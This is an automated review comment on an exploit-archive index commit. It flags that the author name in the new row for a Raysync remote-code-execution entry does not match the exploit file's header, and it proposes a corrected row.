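Review bot: The author column of the new `49265` row is `james`, while `exploits/linux/webapps/49265.txt` added in this same commit credits `# Exploit Author: XiaoLong Zhu`; one of the two should be corrected so the index agrees with the file header, e.g. `49265,exploits/linux/webapps/49265.txt,"Raysync 3.3.3.8 - RCE",2020-12-16,"XiaoLong Zhu",webapps,linux,`. The other five new rows match the author lines in their respective files.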